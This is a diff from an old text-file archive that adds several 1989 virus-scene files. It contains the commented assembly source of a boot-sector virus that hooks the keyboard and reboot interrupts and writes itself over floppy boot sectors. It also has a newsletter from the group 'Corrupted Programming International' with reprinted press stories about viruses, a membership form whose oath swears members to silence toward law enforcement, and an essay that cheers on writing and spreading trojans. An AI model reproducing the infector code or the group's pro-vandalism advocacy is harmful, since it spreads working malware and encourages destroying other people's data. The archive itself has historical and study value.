;COPY INT 9 VECTOR TO + MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) + MOV CX,0004 ; + ; + CLI ; + REP MOVSB ; + MOV Word Ptr [9*4],offset NEW_09 + MOV [(9*4)+2],ES ; + STI ; + ; + RET ; + ; +;-----------------------------------------------------------------------; +; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; +;-----------------------------------------------------------------------; +ACK_KEYBD: ; + IN AL,61H ;RESET KEYBOARD THEN CONTINUE + MOV AH,AL ; + OR AL,80H ; + OUT 61H,AL ; + XCHG AL,AH ; + OUT 61H,AL ; + JMP RBOOT ; + ; +;-----------------------------------------------------------------------; +; DATA AREA WHICH IS NOT USED IN THIS VERSION ; +; REASON UNKNOWN ; +;-----------------------------------------------------------------------; +TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 + DB 27H,0,2,2 ; (CURRENTLY NOT USED) + DB 27H,0,3,2 ; + DB 27H,0,4,2 ; + DB 27H,0,5,2 ; + DB 27H,0,6,2 ; + DB 27H,0,7,2 ; + DB 27H,0,8,2 ; + ; +;A7C9A LABEL BYTE ; + DW 00024H ;NOT USED + DB 0ADH ; + DB 07CH ; + DB 0A3H ; + DW 00026H ; + ; +;L7CA1: ; + POP CX ;NOT USED + POP DI ; + POP SI ; + POP ES ; + POP DS ; + POP AX ; + POPF ; + JMP 1111:1111 ; + ; +;-----------------------------------------------------------------------; +; IF ALT & CTRL & DEL THEN ... ; +; IF ALT & CTRL & ? THEN ... ; +;-----------------------------------------------------------------------; +NEW_09: PUSHF ; + STI ; + ; + PUSH AX ; + PUSH BX ; + PUSH DS ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME + IN AL,60H ;GET SCAN CODE + MOV AH,AL ;SAVE IN AH + AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH + ; + CMP AL,1DH ;IS IT A [CTRL]... + JNE N09_10 ;...JUMP IF NO + MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) + JMP N09_30 ; + ; +N09_10: CMP AL,38H ;IS IT AN [ALT]... + JNE N09_20 ;...JUMP IF NO + MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) + JMP N09_30 ; + ; +N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... + JNE N09_30 ;...JUMP IF NO + ; + CMP AL,17H ;IF [I]... + JE N09_X0 ;...JUMP IF YES + CMP AL,53H ;IF [DEL]... + JE ACK_KEYBD ;...JUMP IF YES + ; +N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME + ; +N09_90: POP DS ; + POP BX ; + POP AX ; + POPF ; + ; + DB 0EAH ;JMP F000:E987 +OLD_09 DW ? ; + DW 0F000H ; + ; +N09_X0: JMP N09_X1 ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? + MOV AX,0800H ;AL=0, AH=DELAY ARG + OUT DX,AL ; + CALL DELAY ; + MOV [ALT_CTRL],AX ;AX=0 ; + ; + MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR + INT 10H ; + MOV AH,2 ;SET CURSOR POS 0,0 + XOR DX,DX ; + MOV BH,DH ; PAGE 0 + INT 10H ; + ; + MOV AH,1 ;SET CURSOR TYPE + MOV CX,0607H ; + INT 10H ; + ; + MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) + CALL DELAY ; + ; + CLI ; + OUT 20H,AL ;SEND EOI TO INT CONTROLLER + ; + MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS + MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) + MOV SI,offset BEGIN - 128 ; + MOV CX,128 ; + CLD ; + REP MOVSB ; + ; + MOV DS,CX ;CX=0 ;DS=0 + ; + MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR + MOV [(19H*4)+2],CS ; + ; + MOV AX,0040H ;DS = ROM DATA AREA + MOV DS,AX ; + ; + MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 + INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) + ; + PUSH DS ;IF BIOS F000:E502 == 21E4... + MOV AX,0F000H ; + MOV DS,AX ; + CMP Word Ptr [0E502H],21E4H ; + POP DS ; + JE R_90 ; + INT 19H ; IF NOT...REBOOT + ; +R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! + ; +;-----------------------------------------------------------------------; +; REBOOT INT VECTOR ; +;-----------------------------------------------------------------------; +NEW_19: XOR AX,AX ; + ; + MOV DS,AX ;DS=0 + MOV AX,[0410] ;AX=EQUIP FLAG + TEST AL,1 ;IF FLOPPY DRIVES ... + JNZ N19_20 ;...JUMP +N19_10: PUSH CS ;ELSE ES=CS + POP ES ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + INT 18H ;LOAD BASIC + ; +N19_20: MOV CX,0004 ;RETRY COUNT = 4 + ; +N19_22: PUSH CX ; + MOV AH,00 ;RESET DISK + INT 13 ; + JB N19_81 ; + MOV AX,0201 ;READ BOOT SECTOR + PUSH DS ; + POP ES ; + MOV BX,offset BEGIN ; + MOV CX,1 ;TRACK 0, SECTOR 1 + INT 13H ; +N19_81: POP CX ; + JNB N19_90 ; + LOOP N19_22 ; + JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC + ; +;-----------------------------------------------------------------------; +; Reinfection segment. ; +;-----------------------------------------------------------------------; +N19_90: CMP DI,3456 ;IF NOT FLAG SET... + JNZ RE_INFECT ;...RE INFECT + ; +JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR + JMP 0000:7C00H ; + ; +;-----------------------------------------------------------------------; +; Reinfection Segment. ; +;-----------------------------------------------------------------------; +RE_INFECT: ; + MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH + MOV CX,00E6H ; OURSELF + MOV DI,SI ; + PUSH CS ; + POP ES ; + CLD ; + REPE CMPSB ; + JE RI_12 ;IF NOT EQUAL... + ; + INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) + ; +;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; + MOV BX,offset TABLE ;FORMAT INFO + MOV DX,0000 ;DRIVE A: HEAD 0 + MOV CH,40-1 ;TRACK 39 + MOV AH,5 ;FORMAT + JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! + ; +; <<< NO EXECUTION PATH TO HERE >>> ; + JB RI_80 ; + ; +;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 +RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 + MOV BX,offset BEGIN ;TRACK 40H + MOV CL,8 ;SECTOR 8 + MOV AX,0301H ;WRITE 1 SECTOR + INT 13H ; + ; + PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) + POP ES ; + JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE + ; + MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! + MOV AX,0301 ; + INT 13H ; + JB RI_80 ; IF ERROR...JUMP TO BOOT CODE + ; +RI_12: MOV DI,3456H ;SET oJUST INFECTED ANOTHER ONE@... + INT 19H ;...FLAG AND REBOOT + ; +RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) + JMP JMP_BOOT ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS + ; + MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG + MOV BX,0040H ; + MOV DS,BX ; + MOV [0072H],AX ; 0040:0072 = RESET FLAG + JMP N09_90 ; + ; +;-----------------------------------------------------------------------; +; DELAY ; +; ; +; ON ENTRY AH:CX = LOOP COUNT ; +;-----------------------------------------------------------------------; +DELAY: SUB CX,CX ; +D_01: LOOP $ ; + SUB AH,1 ; + JNZ D_01 ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A7DF4 DB 27H,00H,8,2 + +COUNTER_1 DW 001CH +ALT_CTRL DW 0 +A7DFC DB 27H,0,8,2 + + +Subject: CPI Issue 2 10/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.10] + + Virili In The News + ------------------ + This section deals with a large amount of stuff, basically, a bunch + of viruses and stuff that have been in the newspapers and magazines cuz + all of the damage they have done. Enjoy.... + + + ThereYs A Virus In My Software + + Mischief-makers at the computer + are deliberately endangering data + + By Philip J. Hilts + + Washington Post Staff Writer + + The Washington Post Weekly Edition, Page #38. May 23-29, 1988. + + Tiny programs that are deliberately cause mischief are epidemic among +computers and causing nervousness among those who monitor them. Since the +first tests of the notion in 1983 that machines can catch and spread +oinformation diseases,@ the computer world has reached the point at which as +many as thirty instances of ocomputer virus@ have been reported in the past +year, affecting tens of thousands of U.S. computers alone. + + Such viruses have been found at the National Aeronautics and Space +Administration, International Business Machines Corporation, the House of +Representatives, at least six universities, several major computer networks +such as Comp-u-serve and several businesses, including the worldYs largest +computer-service company, the $4.4 billion Electronic Data Systems +Corporation of Dallas, Texas. + + Written by malicious programmers, the viruses are sneaked into computer +systems by piggybacking them on legitimate programs and messages. There, +they may be passed along or instructed to wait until a prearranged moment to +burst forth and destroy data. + + Hundreds of computers at the Hebrew University of Jerusalem and other +places in Israel were hit last fall by a virus designed to spread and then, +in one swipe on a Friday the thirteenth, destroy all data in any computer it +could reach. + + If not for an error by itYs author, who has not been caught, the virus +could have caused devastation among micro-computers in Israel and other +nations. The virus did not check to see whether it already had infected a +program and so infected some computers hundreds of times, crowding their +memories enough to call attention to itself. + + In a seven-month campaign, programmers in Israel hastened to find +infected machines and ensure that the smallest number would be affected +before Friday, May 13th. Officials say they initially thought that the +infection was connected with the anniversary of the last day that Palestine +existed as a political entity but subsequently decided that it most likely +involved just Friday the thirteenth. + + Apparently, the campaign was successful; there has been no word of +substantial damage. This past Friday the thirteenth is this yearYs only such +day. + + At the Aldus Corporation of Seattle, Washington, a major software maker, +executives are huddling with lawyers to try to determine whether +international spread of such diseases is illegal. No virus cases have been +taken to court. + + At N.A.S.A. headquarters in Washington, several hundred computers had to +be resuscitated after being infected. N.A.S.A. officials have taken +precautions and reminded their machinesY users to follow routine computer +hygiene: DonYt trust foreign data or strange machines. + + Viruses have the eerie ability to perch disguised among legitimate data +just as biological viruses hide among genes in human cells, then spring out +unexpectedly, multiplying and causing damage. Experts say that even when +they try to study viruses in controlled conditions, the programs can get out +of control and erase everything in a computer. The viruses can be virtually +impossible to stop if their creators are determined enough. + + oThe only way to protect every-body from them is to do something much +worse than the viruses: Stop talking to one another with computers,@ says +William H. Murray, an information-security specialist at Ernst and Whinney +financial consultants in Hartford, Connecticut. + + Hundreds of programs and files have been destroyed by viruses, and +thousands of hours of repair or prevention time have been logged. +Programmers have quickly produced antidote programs with such titles as +oVaccine,@ oFlu Shot,@ oData Physician,@ oSyringe.@ + + Experts says known damage is minimal compared with the huge, destructive +potential. They express the hope that the attacks will persuade computer +users to minimize access to programming and data. + + oWhat we are dealing with here is the fabric of trust in society,@ says +Murray. oWith computer viruses, we have a big vulnerability.@ + + Early this year, Aldus Corporation discovered that a virus had been +introduced that infected at least five-thousand copies of a new drawing +program called Freehand for the Macintosh computer. The infected copies were +packaged, sent to stores and sold. On March 2, the virus interrupted users +by flashing this message on their screens: + + oRichard Brandow, publisher of MacMag, and its entire staff would like +to take this opportunity to convey their universal message of peace to all +Macintosh users around the world.@ + + Viruses are the newest of evolving methods of computer mayhem, says +Donn B. Parker, a consultant at SRI International, a computer research firm +in Menlo Park, California. One is the oTrojan horse,@ a program that looks +and acts like a normal program but contains hidden commands that eventually +take effect, ordering mischief. Others include the otime bomb,@ which +explodes at a set time, and the ologic bomb,@ which goes off when the +computer arrives at a certain result during normal computation. The osalami +attack@ executes barely noticeable results small acts, such as shaving a +penny from thousands of accounts. + + The computer virus has the capability to command the computer to make +copies of the virus and spread them. A virus typically is written only as a +few hundred characters in a program containing tens of thousands of +characters. When the computer reads legitimate instructions, it encounters +the virus, which instructs the computer to suspend normal operations for a +fraction of a second. + + During that time, the virus instructs the computer to check for other +copies of itself and, if none is found, to make and hide copies. Instruction +to commit damage may be included. A few infamous viruses found in the past +year include: + +[] The oscores@ virus. Named after a file it spawns, it recently entered + several hundred Macintosh computers at N.A.S.A. headquarters. oIt looks + as if it searching for a particular Macintosh program with a name that + no one recognizes,@ spokesman Charles Redmond says. + + This virus, still spreading, has reached computers in CongressY + information system at the National Oceanic and Atmospheric + Administration and at Apple Computer IncorporatedYs government-systems + office in Reston, Virginia. It has hit individuals, businesses and + computer obulletin boards@ where computer hobbyists share information. + It apparently originated in Dallas, Texas and has caused damage, but + seemingly only because of its clumsiness, not an instruction to do + damage. + +[] The obrain@ virus. Named by its authors, it was written by two brothers + in a computer store in Lahore, Pakistan, who put their names, addresses + and phone number in the virus. Like oscores,@ it has caused damage + inadvertently, ordering the computer to copy itself into space that + already contain information. + +[] The oChristmas@ virus. It struck last December after a West German + student sent friends a Christmas message through a local computer + network. The virus told the receiverYs computer to display the + greeting, then secretly send the virus and message to everyone on the + recipientYs regular electronic mailing list. + + The student apparently had no idea that someone on the list had + special, restricted access to a major world-wide network of several + thousand computers run by I.B.M. The network broke down within hours + when the message began multiplying, stuffing the computersY memories. + No permanent damage was done, and I.B.M. says it has made repetition + impossible. + + Demonstrations have shown that viruses can invade the screens of users +with the highest security classification, according to Fred Cohen of +Cincinnati, a researcher who coined the term ocomputer Viruses.@ A standard +computer-protection device at intelligence agencies, he says, denies giving +access by a person at one security level to files of anyone else at a higher +level and allows reading but denies writing of files of anyone lower. + + This, however, oallows the least trusted user to write a program that +can be used by everyone@ and is overy dangerous,@ he says. + + Computers oare all at risk,@ says Cohen, oand will continue to be... not +just from computer viruses. But the viruses represent a new level of threat +because of their subtleness and persistence.@ + + +1.) Computer oviruses@ are actually immature computer programs. Most are + written by malicious programmers intent on destroying information in + computers for fun. + +2.) Those who write virus programs often conceal them on floppy disks that + are inserted in the computer. The disks contain all programs needed to + run the machine, such as word processing programs, drawing programs or + spread sheet programs. + +3.) A malicious programmer makes the disk available to others, saying it + contains a useful program or game. These programs can be lent to others + or put onto computerized: obulletin boards@ where anyone can copy them + for personal use. + +4.) A computer receiving the programs will oread@ the disk and the tiny virus + program at the same time. The virus may then order the computer to do a + number of things: + + A.) Tell it to read the virus and follow instructions. + + B.) Tell it to make a copy of the virus and place it on any disk inserted + in the machine today. + + C.) Tell it to check the computerYs clock, and on a certain date destroy + information that tells it where data is stored on any disk: if an + operator has no way of retrieving information, it is destroyed. + + D.) Tell it not to list the virus programs when the computer is asked for + an index of programs. + +5.) In this way, the computer will copy the virus onto many disks--perhaps + all or nearly all the disks used in the infected machine. The virus may + also be passed over the telephone, when one computer sends or receives + data from another. + +6.) Ultimately hundreds or thousands of people may have infected disks and + potential time bombs in their systems. + + + ----------------------------------------------- + ZVirusY infected hospital computers, + led to epidemic of software mix-ups + ----------------------------------------------- + From the San Diego Tribune + March 23, 1989 + + + BOSTON (UPI) -- A ovirus@ infected computers at three Michigan hospitals +last fall and disrupted patient diagnoses at two of the centers in what appears +to be the first such invasion of a medical computer, it was reported yesterday. + + The infiltration did not harm any patients but delayed diagnoses by +shutting down computers, creating files of non-existent patients and garbling +names on patient records, which could have caused more serious problems, a +doctor said. + + oIt definitely did affect care in delaying things and it could have +affected care in terms of losing this information completely,@ said Dr. Jack +Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak, +Mich., two of the hospitals involved. + + If patient information had been lost, the virus could have forced doctors +to repeat tests that involve exposing patients to radiation, Juni said +yesterday. The phony and garble files could have caused a mix-up in patient +diagnosis, he said. + + oThis was information we were using to base diagnoses on,@ said Juni, who +reported the case in a letter in The New England Journal of Medicine. oWe were +lucky and caught it in time.@ + + A computer virus is a set of instructions designed to reproduce and spread +>from computer to computer. Some viruses do damage in the process, such as +destroying files or overloading computers. + + Paul Pomes, a computer virus expert at the University of Illinois in +Champaign, said this was the first case he had heard of in which a virus had +disrupted a computer used for patient care or diagnosis in a hospital. + + Such disruptions could become more common as personal computers are used +more widely in hospitals, Juni and Pomes said. More people know how to program +-- and therefore sabotage -- personal computers than the more specialized +computers that previously have been used, Pomes said. + + The problem in Michigan surfaced when a computer used to display images +used to diagnose cancer and other diseases began to malfunction at the 250-bed +Troy hospital in August 1988. + + In October, Juni discovered a virus in the computer in the Troy hospital. +The next day, Juni found the same virus in a similar computer in the 1,200-bed +Royal Oak facility, he said. + + The virus apparently arrived in a program in a storage disk that was part +of the Troy computer system, he said. It probably was spread inadvertently to +the Royal Oak computer on a floppy disk used by a resident who worked at both +hospitals to write a research paper, he said. + + The virus also spread to the desk-top computers at the University of +Michigan Medical Center in Ann Arbor, where it was discovered before it caused +problems. + + + oProsecutor Wins Conviction In Computer Data Destruction@ + + September 21, 1988 + + + Fort Worth, Texas (AP) - A former programmer has been convicted of planting +a computer ovirus@ in his employerYs system that wiped out 168,000 records and +was activated like a timb bomb, doing its damage two days after he was fired. + + Tarrant County Assistant District Attorney Davis McCown said he believes e +is the first prosecutor in the country to have someone convicted for destroying +computer records using a ovirus.@ + + oWeYve had people stealing through computers, but not this type of case,@ +McCown said. oThe basis for this offense is deletion.@ + + oItYs very rare that the people who spread the viruses are caught,@ said +John McAfee, chairman of the Computer Virus Industry Association in Santa Clara, +which helps educate the public about viruses and find ways to fight them. + + oThis is absolutely the first time@ for a conviction, McAfee said. + + oIn the past, prosecutors have stayed away from this kind of case because +theyYre too hard to prove,@ McCown said yesterday. They have also been reluctant +because the victim doesnYt want to let anyone know there has been a breach of +security.@ + + Donald Gene Burleson, 40, was convicted of charges of harmful access to a +computer, a third-degree feloy that carries up to 10 years in prison and up to +$5,000 in fines. + + A key to the case was the fact that State District Judge John Bradshaw +allowed the computer program that deleted the files to be introduced as +evidence, McCown said. It would have been difficult to get a conviction +otherwise, he said. + + The District Court jury deliberated six hours before bringing back the +first conviction under the stateYs 3-year-old computer sabotage law. + + Burleson planted the virus in revenge for his firing from an insurance +company, McCown said. + + Jurors were told during a technical and sometimes-complicated three-week +trial that Burleson planted a rogue program in the computer system used to store +records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm. + + A virus is a computer program, often hidden in apparently normal computer +software, that instructs the computer to change or destroy information at a +given time or after a certain sequence of commands. + + The virus, McCown said, was activated Sept. 21, 1985, two days after +Burleson was fired as a computer programmer, because of alleged personality +conflicts with other employees. + + oThere were a series of programs built into the system as early as Labor +Day (1985),@ McCown said. oOnce he got fired, those programs went off.@ + + The virus was discovered two days later, after it had eliminated 168,00 +payroll records, holding up company paychecks for more than a month. The virus +could have caused hundreds of thousands of dollars in damage to the system had +it continued, McCown said. + + +Subject: CPI Issue 2 11/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + + WEST COAST CORRUPTED ALLEGIANCE PRESENTS: + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + >> CORRUPTED PROGRAMMING INTERNATIONAL << + >> MEMBERSHIP APPLICATION << + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + (CPI is a sub-group of WCCA) + +NOTE: The following information is of a totally confidential nature. We must + question you in depth and thouroughly so that our knowledge and idea + of you will be quite complete. Remember, it is the fate of our voting + members who will decide upon your membership, as the result of your + response to this questionarre. Please answer the following completely + and to the best of your ability. Also note that we may decide to voice + validate you or gather any other information through other sources and + will discover if you have placed false or misleading information on + this application. + + +PERSONAL INFORMATION: +----------------------------------------------------------------------------- + Alias(es) You HAVE Used : + Alias(es) You Currently Use : + Your FULL REAL Name : + Your Voice Phone Number :(###)###-#### + Your Data Phone Number :(###)###-#### + Your Mailing Address : + Your City, State & Zip : + Your Age : + Occupation/Grade : + Place of Employment/School : + Work Phone Number : + Your Interests And Hobbies : + +Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency? +If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN) +: +: + +Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone, +Data, Or Long Distance Type Of Company? If So, In What Way? +: +: + + +COMPUTER INFORMATION/EXPERIENCE +----------------------------------------------------------------------------- + Computer Experience (time) : + Modeming Experience (time) : + BBSYs You Frequent (Name/#) : + Some Elite References : + Computers You Have Used : + Computer(s) You Are Using : + Computer You Prefer : + Languages You Have Tried : + Languages You Know Well : + Your Best Language : + Have You Ever Phreaked : + Do You Phreak Regularly : + Have You Ever Hacked : + Do You Hack Regularly : + Have You Ever Cracked : + Do You Crack Regularly : + Ever Made A Virus/Trojan : + Major Accomplishments : + : + +INTERVIEW +----------------------------------------------------------------------------- +Answer In 4 Lines Or Less: + +What do you think Corrupted Programming International is? +: +: +: +: + +When did you first hear about CPI? +: +: +: +: + +Why do you want to be a member of CPI? +: +: +: +: + +Do you know any of the members of CPI? Can you name any or the founders of CPI? +: +: +: +: + +Have you considered the distribuition of Viruses/Trojans as a ocrime@? Why +or why not? Have you ever considered the consequences that could result +>from the acts of releasing a Virus/Trojan? (morally speaking?) +: +: +: +: + +Have you written any text files? (On any underground type of subject) +: +: +: +: + +Are you a member of any other group(s)? Can you name them and their HQ BBS? +: +: +: +: + +What would you consider yourself if you were admitted into CPI, a programmer, +a phreaker, a distributor, a information gatherer, or a vegetable? +: +: +: +: + +Why would you ever want to release or aid in releasing a potential virus/trojan +to the public? +: +: +: +: + +Can you contribute to CPI? How? +:(do you have access to info concerning virus/trojans) +:(exceptional programmer?) +:(got connections?) +:(anything extraordinary?) + + +OATH +----------------------------------------------------------------------------- +Typing your name at the bottom of the following paragraph is the same as +signing your name on an official document. + +authorities - As stated in the document below, the term authorities shall + be defined as any law enforcement agency or any agency that + is/may be affiliated with any law enforcement agency. Also, + this includes any company or agency or person which is/may + be involved with the telephone company or any telephone-type + of service(s). + +I [your name here] do solemnly swear never to report neither to my peers nor +the authorities the actions and duties performed by this group, Corrupted +Programming International, on any account. Also, I realize that if I leave +CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold +the greatest confidence of CPIYs activities, and I agree that any information I +may report to any one or any thing CANNOT be used against CPI and its members +in a court of law. I fully understand that if I were to become affiliated with +the authorities that it would be my duty to remove myself from any membership +if my position presented itself as contradictory towards the group, CPI and its +members. I also comprehend that if I were to be confronted by the authorities, +it my duty as a CPI member, as signed below, is to never disclose or discuss +CPIYs activities to them; however, if I do, I fully agree that the information +disclosed or discussed cannot then be used against CPI or any member(s) of CPI +in a court of law. I further agree that all the terms and restrictions as noted +above also correspond to the entire group of WCCA, West Coast Corrupted +Allegiance. + +Typed:____________________ + + +----------------------------------------------------------------------------- + .Answer Each Question To The Best And Fullest Of Your Ability. +----------------------------------------------------------------------------- + + Upload ALL Applications To The WCCA Headquarters BBS + + T H E A N D R O M E D A S T R A I N + + * 619-566-7093 * 1200/2400 * 24 HRS * + + + _______________________<==| CURRENT WCCA NODES |==>_________________________ + /--------------+------------------------------------+-----------------+------\ + | Phone Number | Node Name | Sysop | Baud | + +--------------+------------------------------------+-----------------+------+ + | 619-484-3508 | The Phrozen Phorest | Ancient Mariner | 1200 | + \--------------+------------------------------------+-----------------+------/ + + Future WCCA Support BBSYs Will Be Active - Applications May Be Turned In Then diff --git a/textfiles.com/virus/cpi1.vir b/textfiles.com/virus/cpi1.vir new file mode 100644 index 00000000..3027d139 --- /dev/null +++ b/textfiles.com/virus/cpi1.vir @@ -0,0 +1,473 @@ + Computer Viruses - A Protagonist's Point Of View + -----===] CORRUPTED PROGRAMMING INTERNATIONAL [===----- + + == CPI Newsletter #1 == + [ Article Written By Doctor Dissector ] + Released : June 27, 1989 + + Call The CPI Headquarters + 619-566-7093 + 1200/2400 Baud :: Open 24 Hours + + + + [1.1] Introduction: + ------------------- + + Welcome to "Computer Viruses - A Protagonist's Point Of View." This + letter, perhaps the beginning of a small newsletter. Well, this "letter," + is written by one person right now, maybe I'll get some people to send in + more info, ideas, and examples to CPI. If you would like to contribute, + please upload text files to CPI Headquarters (see heading for number) and + leave a note to me telling me you are contributing to our magazine. + + Well, as an overview, this article will cover a few topics dealing + with viruses; however, there will be no examples covered as we are short of + programmers at the moment. That reminds me, if you would like to become a + member of CPI, fill out the accompanying text file and upload it to CPI HQ + as an upload to the Sysop, then leave me and the Sysop some mail to tell us + you registered to become a member. We will get back to you as soon as + possible. + + The purpose of this magazine is to expand and broaden the general + computer user's view and knowledge of the dreadful computer Virus, as well + as a bit on Trojans (not the hardware, the SOFTWARE!). Then, after the + knowledge of these computer crackers is better understood, the second + purpose of this newsletter is to teach both methods of developing and + executing a better virus/trojan. We, VRI, feel viruses and trojans are a + vital part of the computer world, and should stand along the trades of + hacking, phreaking, cracking, pirating, and pyro as an equal, not something + to be looked down upon (unless you are hit by one...). + + In the future, we hope CPI will grow and spread, just like a virus, + and encompass a large domain of the crackers, hackers, and other elite out + there so that the life of this group will be maintained, and that this + newsletter, hopefully, won't be the only issue to be released during the + group's existence. + + Doctor Dissector + CPICV Editor/ANE Author + + + Table Of Contents- + + Phile Subject Author + ----- --------------------------------------------------------- + 1.1 Introduction & Table Of Contents.........Doctor Dissector + 1.2 Viruses- What, Where, Why, How...........Doctor Dissector + 1.3 Aspects Of Some Known Viruses............Doctor Dissector + 1.4 Ideas For Future Viruses.................Doctor Dissector + 1.5 Suggested Reading........................Doctor Dissector + 1.6 Conclusion...............................Doctor Dissector + 1.7 CPI Application..........................Doctor Dissector + +Downloaded From P-80 International Information Systems 304-744-2253 + ---------------------------------------------------------------------- + + [1.2] Viruses- What, Where, Why, How + + + If you are a beginner in this field, you may be curious to what + a virus/trojan is. Perhaps you heard about it through some BBS, or + known someone who had their system crashed by one. Well, this is for + you. + + In the Trojan War, way back when, there existed the Trojan + Horse, right? Well, nowadays, there is a modern version of the Trojan + Horse existing is software. The modern, computer, Trojan horse is + really simple, a psychedelic hacker implants destructive code into a + normal (or fake) file. This modified/fake file, when executed will + destroy or remove something from the host computer, usually format + the hard drive, delete all files, or something similar. In order to + distribute the corrupt phile, the hacker goes and does one or more of + various things; depending on how deranged this individual is (hehe). + These things are covered in the following section. + + A virus, in normal terms is an organism which spreads malign + from one host to another, transmitting itself through biological + lines so that both the previous host and the future host become + infected with the virus. Today, there are computer viruses, and just + like biological viruses, they spread from file to file, host to host, + infecting everything it "sees." These computer viruses can either + destroy the code it infects immediately, or over a period of time, + corrupt or damage the host system it thrives upon. For example, a + virus hidden in a file on a BBS could be downloaded to a host system. + Then, the user who downloaded it executes the file, which executes + normally (as seen by the operator), but at the same time, the virus + attacks other files, and infects them, so that each file owned by the + user becomes infected with the virus. Then, at a given time or when + something is fulfilled by the host system, the virus becomes a trojan + and destroys, encrypts, or damages everything available, infected or + un-infected. In general, a virus is a timed trojan that duplicates + itself to other files, which, in effect sustains the virus's life- + span in the computer world, as more host systems are infiltrated by + the disease. + + Now that I've given you a description of the computer virus and + trojan, we can go onto more complex things... well, not really... + + Ok, now, let's trace the life of a virus. A virus/trojan is born + in the mind of some hacker/programmer that decides to develop + something out of the ordinary, not all viruses/trojans are + destructive, often, some are amusing! Anyway, the hacker programs the + code in his/her favorite language; viruses can be developed with + virtually any language, BASIC, Pascal, C, Assembly, Machine Code, + Batch files, and many more. Then, when the disease is complete and + tested, the hacker intentionally infects or implants the code into a + host file, a file that would be executed by another un-suspecting + user, somewhere out there. Then, the hacker does one or more of many + things to distribute his baby. The hacker can upload the infected + file to a local BBS (or many local/LD BBS's), give the infected file + to a computer enemy, upload the infected file to his/her workplace + (if desired...hehe), or execute the phile on spot, on the host + system. Then, the virus, gets downloaded or executed, it infiltrates + the host system, and either infects other files, or trashes the + system instantly. Eventually, the infected system's user gets smart + and either trashes his system manually and starts fresh, or some mega- + technical user attempts to recover and remove the virus from all of + the infected files (a horrendous job). Then, the virus dies, or other + host systems that were previously infected continue, and accidentally + upload or hand out infected files, spreading the disease. Isn't that + neat? + + Now, to answer your questions; I already explained what a + virus/trojan is and how they are developed/destroyed. Now, where do + these suckers come from? Why, some hacker's computer room, of course! + All viruses and trojans begin at some computer where some maniacal + hacker programs the code and implants it somewhere. Then, you ask, + why do they do this? Why hack? Why phreak? Why make stupid pyro piles + of shit? Think about it... This is an ART! Just like the rest. While + Hacking delivers theft of services, Phreaking delivers theft of + services, Cracking/Pirating delivers theft of software and copyright + law breaks, Pyro delivers unlawful arson/explosives, Viruses and + Trojans vandalize (yes, legally it is vandalism and destruction of + property) computer systems and files. Also, these are great to get + back at arch-computer enemies (for you computer nerds out there), and + just wreak havoc among your computer community. Yeah, PHUN at it's + best... + + ---------------------------------------------------------------------- + +Downloaded From P-80 International Information Systems 304-744-2253 + ---------------------------------------------------------------------- + + [1.3] Aspects Of Some Known Viruses + + + Many viruses have been written before and probably after you + read this article. A few names include the Israeli, Lehigh, Pakistani + Brain, Alameda, dBase, and Screen. Keep in mind that most viruses + ONLY infect COM and EXE files, and use the Operating System to spread + their disease. Also, many viruses execute their own code before the + host file begins execution, so after the virus completes passive + execution (without "going off") the program will load and execute + normally. + + Israeli - This one is a TSR virus that, once executed, stayed in + memory and infected both COM and EXE files, affecting both HARD and + FLOPPY disks. Once executed, the virus finds a place to stay 